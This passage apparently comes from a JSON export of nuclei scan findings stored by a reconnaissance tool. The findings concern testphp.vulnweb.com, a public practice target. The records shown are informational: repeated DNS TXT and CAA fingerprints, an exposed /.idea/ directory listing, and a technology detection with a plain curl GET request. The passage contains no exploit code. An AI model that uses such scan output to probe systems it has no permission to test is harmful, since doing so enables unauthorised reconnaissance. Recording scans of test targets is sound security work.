/.idea/</title></head>\r\n<body>\r\n<h1>Index of /.idea/</h1><hr><pre><a href="../">../</a>\r\n<a href="scopes/">scopes/</a> 13-Nov-2012 13:29 -\r\n<a href="acuart.iml">acuart.iml</a> 20-Apr-2012 08:22 292\r\n<a href="encodings.xml">encodings.xml</a> 20-Apr-2012 08:22 171\r\n<a href="misc.xml">misc.xml</a> 20-Apr-2012 08:22 266\r\n<a href="modules.xml">modules.xml</a> 20-Apr-2012 08:22 275\r\n<a href="vcs.xml">vcs.xml</a> 20-Apr-2012 08:22 173\r\n<a href="workspace.xml">workspace.xml</a> 20-Apr-2012 08:23 12473\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 181, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:50.256Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 42105\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 42105\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3595\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 182, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:50.353Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 18143\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 18143\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3595\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 183, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:50.439Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 5824\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 5824\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3595\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 184, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:50.527Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 58445\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 58445\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3595\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 185, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:50.624Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 27568\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 27568\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3595\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 186, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:50.719Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 2055\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 2055\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1795\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 187, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:50.813Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 42017\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 42017\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3594\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 188, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:50.909Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 19988\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 19988\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3593\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 189, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:51.000Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 22035\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 22035\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3595\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 190, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:51.107Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 41691\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 41691\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3594\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 191, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:51.206Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 15122\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 15122\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3594\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 192, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:51.303Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 53888\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 53888\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3595\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 193, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:51.416Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 53310\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 53310\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3593\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 194, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:51.509Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 36627\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 36627\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86400\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 195, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0' 'http://testphp.vulnweb.com'", + "type": "http", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:51.609Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:45 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n"http://www.w3.org/TR/html4/loose.dtd">\n<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">\n\n<!-- InstanceBeginEditable name="document_title_rgn" -->\n<title>Home of Acunetix Art</title>\n<!-- InstanceEndEditable -->\n<link rel="stylesheet" href="style.css" type="text/css">\n<!-- InstanceBeginEditable name="headers_rgn" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language="JavaScript" type="text/JavaScript">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {\n 